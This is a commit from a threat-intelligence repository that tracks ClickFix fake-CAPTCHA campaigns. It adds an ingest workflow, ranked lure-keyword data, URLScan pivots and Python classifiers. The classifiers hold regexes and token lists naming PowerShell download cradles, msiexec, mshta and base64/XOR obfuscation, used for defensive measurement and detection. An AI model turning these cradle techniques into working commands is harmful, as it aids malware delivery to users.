mirror of
https://github.com/iimp0ster/detection-chokepoints
synced 2026-08-09 12:41:00 +00:00
feat(clickgrab): re-source ingest + clean Carson three-feed trend model
Re-source ClickGrab ingest off the dead Git-LFS path onto raw GitHub blobs and re-architect the ClickFix trends page around three feeds, each used only for what it is reliable for (DECISIONS #010-012). Ingest (#010-011): fetch MHaggis ClickGrab as raw blobs (upstream LFS quota exhausted); append-only idempotent volume generator + daily GHA for volume and Carson gist landscape count. Behaviour (#012): rebuild the per-domain command classification from Carson's ClickFix Hunter export (build_domain_monthly.py) and re-plumb charts/cards to it, separating hex-XOR from base64 (the prior site-crawl source conflated them and measured ~93-99% noise). Trends prose corrected to the honest figures: May base64 69% (316/458), inline 95.2%, Nov msiexec 87% (669/767). Workstream B: rank MHaggis lure-page HTML keywords (build_lure_keywords.py) into data-driven URLScan OSINT pivots on the clickfix chokepoint and enrich the multilingual IOK matcher. Validated: scripts/validate_schema.py passes (13 chokepoints, 3 trends files). Deferred: two classifier regex bugs distort Dec-Apr months only; headline figures robust (DECISIONS #013). Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
This commit is contained in:
co-authored by
Claude Opus 4.8
parent
32260237fe
commit
66034135c3
@@ -0,0 +1,77 @@
|
||||
name: Update ClickGrab Trends
|
||||
|
||||
# Appends new ClickFix delivery-chain days to _data/clickgrab_trends.yml from
|
||||
# MHaggis ClickGrab (behavioural data) + Carson Williams' domain gist (landscape
|
||||
# count). Opens a review PR — never pushes to main. The generator is append-only
|
||||
# and idempotent (see docs/DECISIONS.md #010/#011), so re-runs are safe.
|
||||
|
||||
on:
|
||||
workflow_dispatch: # manual / on-demand
|
||||
schedule:
|
||||
- cron: '0 6 * * *' # daily 06:00 UTC — after MHaggis nightly (~01:50 UTC) publishes
|
||||
|
||||
permissions:
|
||||
contents: write # push the data branch
|
||||
pull-requests: write # open the review PR
|
||||
|
||||
concurrency:
|
||||
group: update-clickgrab # don't overlap runs racing on the same data branch
|
||||
cancel-in-progress: false
|
||||
|
||||
jobs:
|
||||
update-clickgrab:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
|
||||
|
||||
- uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5
|
||||
with:
|
||||
python-version: '3.12'
|
||||
|
||||
- name: Install dependencies
|
||||
run: pip install requests PyYAML
|
||||
|
||||
# 14-day window: covers normal daily cadence plus any review-PR backlog
|
||||
# (the generator dedups by watermark, so overlap never double-counts).
|
||||
- name: Ingest ClickGrab nightly reports (raw blobs)
|
||||
env:
|
||||
CLICKGRAB_LOOKBACK_DAYS: '14'
|
||||
run: python scripts/ingest_clickgrab.py
|
||||
|
||||
- name: Ingest Carson ClickFix domain gist
|
||||
run: python scripts/ingest_carson_domains.py
|
||||
|
||||
- name: Append new days to trends data
|
||||
run: python scripts/analyze_clickgrab.py
|
||||
|
||||
- name: Open PR with updated trends data
|
||||
env:
|
||||
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
run: |
|
||||
git config user.name "github-actions[bot]"
|
||||
git config user.email "github-actions[bot]@users.noreply.github.com"
|
||||
|
||||
# Only the aggregate YAML is tracked; cache/ (raw payloads) is gitignored.
|
||||
git add _data/clickgrab_trends.yml
|
||||
if git diff --staged --quiet; then
|
||||
echo "No new ClickGrab days — nothing to update."
|
||||
exit 0
|
||||
fi
|
||||
|
||||
DATE=$(date -u +%Y-%m-%d)
|
||||
BRANCH="data/clickgrab-${DATE}"
|
||||
|
||||
git checkout -b "$BRANCH"
|
||||
git commit -m "chore: update clickgrab trends data [${DATE}]"
|
||||
git push --force -u origin "$BRANCH"
|
||||
|
||||
PR_BODY=$(printf 'Automated ClickGrab trends update.\n\nAppends new ClickFix delivery-chain days from MHaggis ClickGrab (raw blobs) and refreshes the Carson ClickFix domain-landscape count. Append-only: historical sections (payload_examples, domain_monthly, staging_domains) are unchanged; review the daily/monthly/totals/meta delta below, then merge to publish.')
|
||||
if ! gh pr view "$BRANCH" --json state -q .state 2>/dev/null | grep -q "OPEN"; then
|
||||
gh pr create \
|
||||
--title "chore: update clickgrab trends data [${DATE}]" \
|
||||
--body "$PR_BODY" \
|
||||
--base main \
|
||||
--head "$BRANCH"
|
||||
else
|
||||
echo "PR for $BRANCH already open — data updated on existing branch."
|
||||
fi
|
||||
@@ -0,0 +1,134 @@
|
||||
# Generated by scripts/build_lure_keywords.py — ranked ClickFix lure-page HTML
|
||||
# keywords from MHaggis crawls, for chokepoint OSINT pivots + IOK matchers (#012).
|
||||
|
||||
meta:
|
||||
generated: '2026-06-15'
|
||||
source: MHaggis ClickGrab nightly crawls (SuspiciousKeywords)
|
||||
sites_analyzed: 2700
|
||||
lure_keywords:
|
||||
- phrase: robot
|
||||
sites: 1140
|
||||
- phrase: captcha
|
||||
sites: 656
|
||||
- phrase: verification
|
||||
sites: 494
|
||||
- phrase: i am not a robot
|
||||
sites: 388
|
||||
- phrase: to better prove you are not a robot
|
||||
sites: 388
|
||||
- phrase: captcha verification
|
||||
sites: 388
|
||||
- phrase: verification-id
|
||||
sites: 388
|
||||
- phrase: you will observe
|
||||
sites: 388
|
||||
- phrase: verify you are human
|
||||
sites: 342
|
||||
- phrase: verification id
|
||||
sites: 342
|
||||
- phrase: ray id
|
||||
sites: 317
|
||||
- phrase: checking if you are human
|
||||
sites: 317
|
||||
- phrase: captcha-verificatie-id
|
||||
sites: 290
|
||||
- phrase: captchaloading
|
||||
sites: 71
|
||||
- phrase: captcha-logo
|
||||
sites: 71
|
||||
- phrase: captchalisteners
|
||||
sites: 71
|
||||
- phrase: captchacheckbox
|
||||
sites: 71
|
||||
- phrase: captcha-badge
|
||||
sites: 52
|
||||
- phrase: invoke
|
||||
sites: 51
|
||||
- phrase: captcha-js
|
||||
sites: 51
|
||||
- phrase: verification hash
|
||||
sites: 46
|
||||
- phrase: captcha-js-before
|
||||
sites: 26
|
||||
- phrase: amos
|
||||
sites: 26
|
||||
- phrase: captcha-box
|
||||
sites: 25
|
||||
- phrase: captcha-frontend-css
|
||||
sites: 25
|
||||
- phrase: bitmap
|
||||
sites: 24
|
||||
- phrase: virtualalloc
|
||||
sites: 24
|
||||
- phrase: captcha-styles-css
|
||||
sites: 22
|
||||
- phrase: captcha-verified
|
||||
sites: 22
|
||||
- phrase: captcha-overlay
|
||||
sites: 22
|
||||
- phrase: captchaimages
|
||||
sites: 22
|
||||
- phrase: captcha-styles
|
||||
sites: 22
|
||||
- phrase: captcha-loader
|
||||
sites: 22
|
||||
- phrase: captcha-container
|
||||
sites: 22
|
||||
- phrase: captcha-loader-js
|
||||
sites: 22
|
||||
- phrase: captcha-modal
|
||||
sites: 22
|
||||
- phrase: odyssey
|
||||
sites: 21
|
||||
- phrase: captchaerror
|
||||
sites: 14
|
||||
- phrase: captchasitekey
|
||||
sites: 14
|
||||
- phrase: press enter
|
||||
sites: 13
|
||||
lure_families:
|
||||
- name: CaptchaElements
|
||||
sites: 459
|
||||
- name: FakeCloudflare
|
||||
sites: 455
|
||||
- name: FakeGlitchLures
|
||||
sites: 229
|
||||
- name: BotDetection
|
||||
sites: 61
|
||||
- name: ClickFixInstructions
|
||||
sites: 27
|
||||
- name: FakeWindowsUpdate
|
||||
sites: 24
|
||||
urlscan_pivots:
|
||||
- phrase: i am not a robot
|
||||
sites: 388
|
||||
query: page.body:navigator.clipboard AND page.body:"i am not a robot"
|
||||
url: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22i%20am%20not%20a%20robot%22
|
||||
- phrase: to better prove you are not a robot
|
||||
sites: 388
|
||||
query: page.body:navigator.clipboard AND page.body:"to better prove you are not a robot"
|
||||
url: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22to%20better%20prove%20you%20are%20not%20a%20robot%22
|
||||
- phrase: captcha verification
|
||||
sites: 388
|
||||
query: page.body:navigator.clipboard AND page.body:"captcha verification"
|
||||
url: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22captcha%20verification%22
|
||||
- phrase: verification-id
|
||||
sites: 388
|
||||
query: page.body:navigator.clipboard AND page.body:"verification-id"
|
||||
url: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22verification-id%22
|
||||
- phrase: you will observe
|
||||
sites: 388
|
||||
query: page.body:navigator.clipboard AND page.body:"you will observe"
|
||||
url: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22you%20will%20observe%22
|
||||
- phrase: verify you are human
|
||||
sites: 342
|
||||
query: page.body:navigator.clipboard AND page.body:"verify you are human"
|
||||
url: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22verify%20you%20are%20human%22
|
||||
- phrase: verification id
|
||||
sites: 342
|
||||
query: page.body:navigator.clipboard AND page.body:"verification id"
|
||||
url: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22verification%20id%22
|
||||
- phrase: checking if you are human
|
||||
sites: 317
|
||||
query: page.body:navigator.clipboard AND page.body:"checking if you are human"
|
||||
url: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22checking%20if%20you%20are%20human%22
|
||||
+5152
-4592
File diff suppressed because it is too large
Load Diff
@@ -10,7 +10,9 @@
|
||||
var DATA = window.CLICKGRAB_TRENDS;
|
||||
if (!DATA) return;
|
||||
|
||||
var monthly = DATA.monthly || [];
|
||||
// Behavioural trend is the CLEAN per-domain command classification (Carson
|
||||
// ClickFix Hunter export), NOT the noisy MHaggis site-crawl monthly (DECISIONS #012).
|
||||
var monthly = DATA.domain_monthly || [];
|
||||
if (!monthly.length) return;
|
||||
|
||||
/* ── Palette (matches project CSS vars) ─────────────────────────────── */
|
||||
@@ -148,9 +150,9 @@
|
||||
svg.setAttribute('aria-label', 'Monthly malicious site volume');
|
||||
|
||||
var labels = monthly.map(function (m) { return m.month.slice(5); });
|
||||
var malicious = monthly.map(function (m) { return m.malicious; });
|
||||
var yMax = Math.max.apply(null, malicious);
|
||||
var yMaxR = Math.ceil(yMax / 500) * 500 || 500;
|
||||
var counts = monthly.map(function (m) { return m.n; });
|
||||
var yMax = Math.max.apply(null, counts);
|
||||
var yMaxR = Math.ceil(yMax / 100) * 100 || 100;
|
||||
|
||||
drawAxes(svg, pad, W, H, yMaxR, labels, 5);
|
||||
|
||||
@@ -162,7 +164,7 @@
|
||||
|
||||
monthly.forEach(function (m, i) {
|
||||
var cx = pad.left + slotW * (i + 0.5);
|
||||
var mal = m.malicious;
|
||||
var mal = m.n;
|
||||
|
||||
var hMal = (mal / yMaxR) * chartH;
|
||||
var yMal = pad.top + chartH - hMal;
|
||||
@@ -172,7 +174,7 @@
|
||||
}));
|
||||
|
||||
var html = '<strong style="color:#c9d1d9">' + m.month + '</strong><br>'
|
||||
+ '<span style="color:' + C.red + '">▮ Malicious sites: ' + mal + '</span>';
|
||||
+ '<span style="color:' + C.red + '">▮ ClickFix domains: ' + mal + '</span>';
|
||||
hitZone(svg, cx, pad.top + chartH / 2, slotW, chartH, html);
|
||||
});
|
||||
|
||||
@@ -193,15 +195,17 @@
|
||||
svg.setAttribute('aria-label', 'Cradle family monthly distribution');
|
||||
|
||||
var series = [
|
||||
{ key: 'iwr_iex', label: 'IWR/IEX', color: C.yellow },
|
||||
{ key: 'webclient', label: 'WebClient', color: C.orange },
|
||||
{ key: 'curl', label: 'Curl/Bash', color: C.purple },
|
||||
{ key: 'irm_iex', label: 'IRM/IEX', color: C.cyan },
|
||||
{ key: 'msiexec', label: 'MSIExec', color: C.red },
|
||||
{ key: 'webclient', label: 'WebClient', color: C.orange },
|
||||
{ key: 'curl', label: 'Curl', color: C.purple },
|
||||
{ key: 'iwr', label: 'IWR', color: C.yellow },
|
||||
{ key: 'irm', label: 'IRM', color: C.cyan },
|
||||
{ key: 'vbs', label: 'VBS/WSH', color: C.green },
|
||||
];
|
||||
|
||||
var labels = monthly.map(function (m) { return m.month.slice(5); });
|
||||
var allVals = monthly.map(function (m) {
|
||||
return series.reduce(function (s, sr) { return s + (m.cradles[sr.key] || 0); }, 0);
|
||||
return series.reduce(function (s, sr) { return s + (m[sr.key] || 0); }, 0);
|
||||
});
|
||||
var yMax = Math.max.apply(null, allVals);
|
||||
var yMaxR = Math.ceil(yMax / 100) * 100 || 100;
|
||||
@@ -217,7 +221,7 @@
|
||||
|
||||
// Draw a line per series
|
||||
series.forEach(function (sr) {
|
||||
var pts = monthly.map(function (m) { return m.cradles[sr.key] || 0; });
|
||||
var pts = monthly.map(function (m) { return m[sr.key] || 0; });
|
||||
|
||||
// Area fill
|
||||
var areaPath = 'M ' + xOf(0) + ',' + yOf(0);
|
||||
@@ -245,7 +249,7 @@
|
||||
var m = monthly[i];
|
||||
var html = '<strong style="color:#c9d1d9">' + m.month + '</strong><br>'
|
||||
+ '<span style="color:' + sr.color + '">▮ ' + sr.label + ': ' + v + '</span><br>'
|
||||
+ '<span style="color:' + C.text + '">Malicious sites: ' + m.malicious + '</span>';
|
||||
+ '<span style="color:' + C.text + '">Domains: ' + m.n + '</span>';
|
||||
hitZone(svg, xOf(i), yOf(v), 20, 20, html);
|
||||
});
|
||||
});
|
||||
@@ -278,18 +282,15 @@
|
||||
svg.setAttribute('aria-label', 'Evasion technique monthly trends');
|
||||
|
||||
var series = [
|
||||
{ key: 'base64', label: 'Base64 encoding', color: C.yellow },
|
||||
{ key: 'hidden_window',label: 'Hidden window', color: C.blue },
|
||||
{ key: 'mixed_case', label: 'Mixed-case PS', color: C.orange },
|
||||
{ key: 'cdn_staging', label: 'CDN staging', color: C.cyan },
|
||||
{ key: 'self_delete', label: 'Self-delete', color: C.red },
|
||||
{ key: 'start_sleep', label: 'Start-Sleep', color: C.purple },
|
||||
{ key: 'no_url', label: 'Inline (no URL)', color: C.red },
|
||||
{ key: 'base64', label: 'Base64 encoding', color: C.yellow },
|
||||
{ key: 'hex_xor', label: 'Hex-XOR', color: C.cyan },
|
||||
];
|
||||
|
||||
var labels = monthly.map(function (m) { return m.month.slice(5); });
|
||||
var allVals = [];
|
||||
monthly.forEach(function (m) {
|
||||
series.forEach(function (sr) { allVals.push(m.evasion[sr.key] || 0); });
|
||||
series.forEach(function (sr) { allVals.push(m[sr.key] || 0); });
|
||||
});
|
||||
var yMax = Math.max.apply(null, allVals);
|
||||
var yMaxR = Math.ceil(yMax / 500) * 500 || 500;
|
||||
@@ -304,7 +305,7 @@
|
||||
function yOf(v) { return pad.top + chartH - (v / yMaxR) * chartH; }
|
||||
|
||||
series.forEach(function (sr) {
|
||||
var pts = monthly.map(function (m) { return m.evasion[sr.key] || 0; });
|
||||
var pts = monthly.map(function (m) { return m[sr.key] || 0; });
|
||||
|
||||
var linePath = pts.map(function (v, i) {
|
||||
return (i === 0 ? 'M' : 'L') + ' ' + xOf(i) + ',' + yOf(v);
|
||||
@@ -322,7 +323,7 @@
|
||||
var m = monthly[i];
|
||||
var html = '<strong style="color:#c9d1d9">' + m.month + '</strong><br>'
|
||||
+ '<span style="color:' + sr.color + '">▮ ' + sr.label + ': ' + v + '</span><br>'
|
||||
+ '<span style="color:' + C.text + '">Malicious sites: ' + m.malicious + '</span>';
|
||||
+ '<span style="color:' + C.text + '">Domains: ' + m.n + '</span>';
|
||||
hitZone(svg, xOf(i), yOf(v), 20, 20, html);
|
||||
});
|
||||
});
|
||||
|
||||
@@ -570,6 +570,22 @@ OsintSources:
|
||||
URL: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22Win%2BR%22
|
||||
Notes: 'Pages with clipboard API AND Run dialog instruction. The execution step unique to ClickFix.
|
||||
Swap "Win+R" for "PowerShell" or "Terminal" to find TerminalFix variants.'
|
||||
- Platform: URLScan
|
||||
Query: 'page.body:navigator.clipboard AND page.body:"to better prove you are not a robot"'
|
||||
URL: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22to%20better%20prove%20you%20are%20not%20a%20robot%22
|
||||
Notes: 'Data-driven from MHaggis crawls (388 of 2700 lures, see _data/clickfix_lure_keywords.yml).
|
||||
A verbatim fake-CAPTCHA instruction string — very high precision because the exact phrasing is
|
||||
near-unique to the ClickFix lure kit, independent of clipboard payload, cradle, or staging infra.'
|
||||
- Platform: URLScan
|
||||
Query: 'page.body:navigator.clipboard AND page.body:"checking if you are human"'
|
||||
URL: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22checking%20if%20you%20are%20human%22
|
||||
Notes: 'Cloudflare-interstitial impersonation phrase (317 lures, FakeCloudflare family). Catches the
|
||||
family regardless of cradle; pairing with the clipboard write keeps FP low vs the real Cloudflare page.'
|
||||
- Platform: URLScan
|
||||
Query: 'page.body:navigator.clipboard AND page.body:"captcha-verificatie-id"'
|
||||
URL: https://urlscan.io/search/#page.body%3Anavigator.clipboard%20AND%20page.body%3A%22captcha-verificatie-id%22
|
||||
Notes: 'Multilingual coverage — Dutch CAPTCHA-id string (290 lures). The kit is localized; English-only
|
||||
page.body hunts miss translated lures, so track per-language variants for your threat landscape.'
|
||||
- Platform: VirusTotal Intelligence
|
||||
Query: behavior_processes:"nslookup.exe" tag:powershell
|
||||
URL: https://www.virustotal.com/gui/search/behavior_processes%3A%22nslookup.exe%22%20tag%3Apowershell
|
||||
|
||||
@@ -56,6 +56,9 @@ detection:
|
||||
# js|contains; add dom|contains matchers if your scanner supports post-JS rendering.
|
||||
# - Multilingual lures: add translated execution instructions for your threat landscape
|
||||
# (e.g., Japanese: 'を押して', Korean: '실행', etc.)
|
||||
# Observed in the wild (MHaggis crawls — _data/clickfix_lure_keywords.yml): Dutch
|
||||
# 'captcha-verificatie-id' on 290 of 2700 lures. Localized kits evade English-only
|
||||
# matchers; the ranked lure-keyword data file is the source for landscape-specific terms.
|
||||
# - Dynamically injected clipboard write (loaded from external JS) evades js|contains;
|
||||
# pair with requests|contains for known ClickFix JS CDN patterns.
|
||||
#
|
||||
|
||||
+408
-642
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,209 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
build_domain_monthly.py
|
||||
Recompute the CLEAN per-domain ClickFix behavioural trend from Carson Williams'
|
||||
ClickFix Hunter export and write it into _data/clickgrab_trends.yml.
|
||||
|
||||
WHY this source (see docs/DECISIONS.md #012): the page's delivery-chain analysis
|
||||
(cradle families, evasion, inline payloads) must come from Carson's export, which
|
||||
records the ACTUAL clipboard command per domain (clean), NOT from MHaggis ClickGrab's
|
||||
per-site web crawls (whose site-level cradle/evasion classification is dominated by
|
||||
'Likely Safe' lure pages and UI-string base64 — a judge panel measured ~93-99% noise).
|
||||
Carson's export = the real ClickFix command per domain, so classifying it is honest.
|
||||
|
||||
Carson export schema (sheet 'Data'): domain | url | timestamp | commandline
|
||||
Output (into _data/clickgrab_trends.yml, other sections preserved):
|
||||
domain_monthly[] per-month technique prevalence (drives the charts)
|
||||
domain_cradles_total cumulative cradle counts (drives the stat cards)
|
||||
domain_evasion_totals cumulative evasion counts (base64 / hex_xor / inline)
|
||||
meta.total_domains unique ClickFix domains in the export
|
||||
|
||||
Usage:
|
||||
python scripts/build_domain_monthly.py [path/to/clickfix-domains-all-YYYY-MM-DD.xlsx]
|
||||
Default input: newest clickfix-domains-all-*.xlsx in ~/Downloads.
|
||||
"""
|
||||
|
||||
import glob
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
from collections import OrderedDict, defaultdict
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
|
||||
import openpyxl
|
||||
import yaml
|
||||
|
||||
REPO_ROOT = Path(__file__).parent.parent
|
||||
TRENDS_YML = REPO_ROOT / "_data" / "clickgrab_trends.yml"
|
||||
DEFAULT_GLOB = str(Path(os.path.expanduser("~")) / "Downloads" / "clickfix-domains-all-*.xlsx")
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Classification — applied to the real clipboard command string per domain.
|
||||
# Counts are PREVALENCE (non-exclusive): a domain is counted under every technique
|
||||
# its command uses, matching the page's "msiexec 87% (669/767)" framing.
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
CRADLE_RE = OrderedDict([
|
||||
("iwr", re.compile(r"\biwr\b|invoke-webrequest", re.I)),
|
||||
("irm", re.compile(r"\birm\b|invoke-restmethod", re.I)),
|
||||
("webclient", re.compile(r"webclient|downloadstring|downloadfile", re.I)),
|
||||
("curl", re.compile(r"\bcurl\b", re.I)),
|
||||
("msiexec", re.compile(r"\bmsiexec\b", re.I)),
|
||||
("mshta", re.compile(r"\bmshta\b", re.I)),
|
||||
("vbs", re.compile(r"winhttp|\bwscript\b|createobject\(|\.vbs\b", re.I)),
|
||||
])
|
||||
EVASION_RE = OrderedDict([
|
||||
("hex_xor", re.compile(r"-bxor", re.I)),
|
||||
("base64", re.compile(r"frombase64string|-enc\b|-encodedcommand", re.I)),
|
||||
])
|
||||
URL_RE = re.compile(r"https?://", re.I)
|
||||
|
||||
CRADLE_KEYS = list(CRADLE_RE.keys())
|
||||
EVASION_KEYS = list(EVASION_RE.keys()) + ["no_url"]
|
||||
|
||||
|
||||
def classify_commandline(cmd: str) -> dict:
|
||||
"""Return {technique: bool} for one clipboard command. `no_url` = an inline
|
||||
payload (the command fetches nothing remote)."""
|
||||
flags = {}
|
||||
for k, rx in CRADLE_RE.items():
|
||||
flags[k] = bool(rx.search(cmd))
|
||||
for k, rx in EVASION_RE.items():
|
||||
flags[k] = bool(rx.search(cmd))
|
||||
flags["no_url"] = not bool(URL_RE.search(cmd))
|
||||
return flags
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Read the export
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _pick_export(arg: str | None) -> Path:
|
||||
if arg:
|
||||
return Path(arg)
|
||||
matches = sorted(glob.glob(DEFAULT_GLOB))
|
||||
if not matches:
|
||||
print(f"ERROR: no clickfix-domains-all-*.xlsx found in {DEFAULT_GLOB}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
# Filenames carry the export date — newest by name == latest snapshot.
|
||||
return Path(matches[-1])
|
||||
|
||||
|
||||
def read_rows(path: Path) -> list:
|
||||
"""Return [(domain, timestamp, commandline)] from the export's Data sheet."""
|
||||
wb = openpyxl.load_workbook(path, read_only=True, data_only=True)
|
||||
ws = wb[wb.sheetnames[0]]
|
||||
it = ws.iter_rows(values_only=True)
|
||||
header = [str(c).strip().lower() if c is not None else "" for c in next(it)]
|
||||
idx = {name: header.index(name) for name in ("domain", "timestamp", "commandline") if name in header}
|
||||
if not {"domain", "timestamp", "commandline"} <= idx.keys():
|
||||
print(f"ERROR: export missing expected columns; got {header}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
out = []
|
||||
for r in it:
|
||||
dom = r[idx["domain"]]
|
||||
ts = r[idx["timestamp"]]
|
||||
cmd = r[idx["commandline"]]
|
||||
if dom:
|
||||
out.append((str(dom).strip().lower(), ts, str(cmd or "")))
|
||||
wb.close()
|
||||
return out
|
||||
|
||||
|
||||
def _month(ts) -> str:
|
||||
if isinstance(ts, datetime):
|
||||
return ts.strftime("%Y-%m")
|
||||
s = str(ts or "")
|
||||
return s[:7] if len(s) >= 7 and s[4] == "-" else ""
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Aggregate
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def build(rows: list) -> dict:
|
||||
# Dedup by domain (an export row == a unique ClickFix domain); keep the first
|
||||
# observation's month + command so re-counts are stable.
|
||||
seen = {}
|
||||
for dom, ts, cmd in rows:
|
||||
if dom not in seen:
|
||||
seen[dom] = (_month(ts), cmd)
|
||||
|
||||
months = defaultdict(lambda: {"n": 0, **{k: 0 for k in CRADLE_KEYS}, **{k: 0 for k in EVASION_KEYS}})
|
||||
cradles_total = {k: 0 for k in CRADLE_KEYS}
|
||||
evasion_total = {k: 0 for k in EVASION_KEYS}
|
||||
|
||||
for dom, (mon, cmd) in seen.items():
|
||||
if not mon:
|
||||
continue
|
||||
flags = classify_commandline(cmd)
|
||||
m = months[mon]
|
||||
m["n"] += 1
|
||||
for k in CRADLE_KEYS:
|
||||
m[k] += flags[k]; cradles_total[k] += flags[k]
|
||||
for k in EVASION_KEYS:
|
||||
m[k] += flags[k]; evasion_total[k] += flags[k]
|
||||
|
||||
domain_monthly = []
|
||||
for mon in sorted(months):
|
||||
m = months[mon]
|
||||
n = m["n"]
|
||||
entry = {"month": mon, "n": n}
|
||||
for k in CRADLE_KEYS:
|
||||
entry[k] = m[k]
|
||||
entry["hex_xor"] = m["hex_xor"]
|
||||
entry["base64"] = m["base64"]
|
||||
entry["no_url"] = m["no_url"]
|
||||
entry["no_url_pct"] = round(100 * m["no_url"] / n, 1) if n else 0.0
|
||||
domain_monthly.append(entry)
|
||||
|
||||
return {
|
||||
"domain_monthly": domain_monthly,
|
||||
"domain_cradles_total": cradles_total,
|
||||
"domain_evasion_totals": evasion_total,
|
||||
"total_domains": len(seen),
|
||||
}
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Write
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def main() -> None:
|
||||
export = _pick_export(sys.argv[1] if len(sys.argv) > 1 else None)
|
||||
print(f"Reading Carson export: {export.name}")
|
||||
rows = read_rows(export)
|
||||
result = build(rows)
|
||||
dm = result["domain_monthly"]
|
||||
print(f" {result['total_domains']} unique domains over {len(dm)} months "
|
||||
f"({dm[0]['month']} .. {dm[-1]['month']})")
|
||||
|
||||
if not TRENDS_YML.exists():
|
||||
print(f"ERROR: {TRENDS_YML} missing", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
data = yaml.safe_load(TRENDS_YML.read_text(encoding="utf-8"))
|
||||
|
||||
data["domain_monthly"] = dm
|
||||
data["domain_cradles_total"] = result["domain_cradles_total"]
|
||||
data["domain_evasion_totals"] = result["domain_evasion_totals"]
|
||||
meta = data.setdefault("meta", {})
|
||||
meta["total_domains"] = result["total_domains"]
|
||||
meta["domain_source"] = export.name
|
||||
meta["domain_updated"] = datetime.now(timezone.utc).strftime("%Y-%m-%d")
|
||||
|
||||
header = (
|
||||
"# Generated by scripts/analyze_clickgrab.py (volume) + build_domain_monthly.py (behaviour).\n"
|
||||
"# domain_monthly / domain_*_total are the CLEAN per-domain command classification from\n"
|
||||
"# Carson's ClickFix Hunter export and drive the page charts/cards (see DECISIONS #012).\n\n"
|
||||
)
|
||||
body = yaml.safe_dump(data, sort_keys=False, allow_unicode=True, default_flow_style=False, width=4096)
|
||||
TRENDS_YML.write_text(header + body, encoding="utf-8")
|
||||
|
||||
print(f" cradles: {result['domain_cradles_total']}")
|
||||
print(f" evasion: {result['domain_evasion_totals']}")
|
||||
print(f"Written: {TRENDS_YML}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,147 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
build_lure_keywords.py
|
||||
Aggregate the lure-page HTML keywords MHaggis ClickGrab extracts from each crawled
|
||||
ClickFix site into ranked, data-driven OSINT signal.
|
||||
|
||||
WHY MHaggis here (see docs/DECISIONS.md #012): MHaggis CRAWLS the live lure pages,
|
||||
so its SuspiciousKeywords list is the right material for lure-page fingerprinting —
|
||||
URLScan page.body pivots and IOK html|contains matchers — even though its site-level
|
||||
CRADLE classification is too noisy for the behavioural trend (that's Carson's job).
|
||||
|
||||
The SuspiciousKeywords list mixes genuine lure phrases ("i am not a robot",
|
||||
"checking if you are human", the Dutch "captcha-verificatie-id") with command
|
||||
fragments ("cmd /c curl ...", "powershell -w h ..."). We keep only natural-language
|
||||
LURE phrases — those are what a URLScan page.body query or an IOK html matcher hunts.
|
||||
|
||||
INPUT: cache/clickgrab/days/<date>.json (MHaggis per-site records)
|
||||
OUTPUT: _data/clickfix_lure_keywords.yml (ranked keywords + lure families + pivots)
|
||||
|
||||
Usage:
|
||||
python scripts/build_lure_keywords.py
|
||||
"""
|
||||
|
||||
import glob
|
||||
import json
|
||||
import re
|
||||
import sys
|
||||
from collections import Counter
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from urllib.parse import quote
|
||||
|
||||
import yaml
|
||||
|
||||
REPO_ROOT = Path(__file__).parent.parent
|
||||
DAYS_DIR = REPO_ROOT / "cache" / "clickgrab" / "days"
|
||||
OUT_PATH = REPO_ROOT / "_data" / "clickfix_lure_keywords.yml"
|
||||
|
||||
LURE_FLAGS = ["CaptchaElements", "FakeCloudflare", "FakeGlitchLures", "BotDetection",
|
||||
"ClickFixInstructions", "FakeWindowsUpdate", "FakeBrowserUpdate",
|
||||
"FakeVideoConferencing", "FakeSoftwareDownloads"]
|
||||
|
||||
# Drop anything that is a command fragment, code identifier, or shell token rather
|
||||
# than a human-readable lure phrase a defender would pivot on.
|
||||
CMD_TOKENS = re.compile(
|
||||
r"cmd|powershell|\bcurl\b|\biwr\b|\biex\b|http|//|\\|\.ps1|\.exe|\.vbs|\.bat|"
|
||||
r"bypass|-enc|frombase64|command\s*=|responsetext|wscript|hidden|%temp%|"
|
||||
r"-w\b|const\b|webclient|mshta|conhost|invoke-", re.I)
|
||||
# A lure phrase: 3-60 chars, letters/digits/space/hyphen/apostrophe only.
|
||||
LURE_SHAPE = re.compile(r"^[a-z0-9 '\-]{3,60}$")
|
||||
|
||||
|
||||
def is_lure_phrase(kw: str) -> bool:
|
||||
k = kw.strip().lower()
|
||||
if not LURE_SHAPE.match(k):
|
||||
return False
|
||||
if CMD_TOKENS.search(k):
|
||||
return False
|
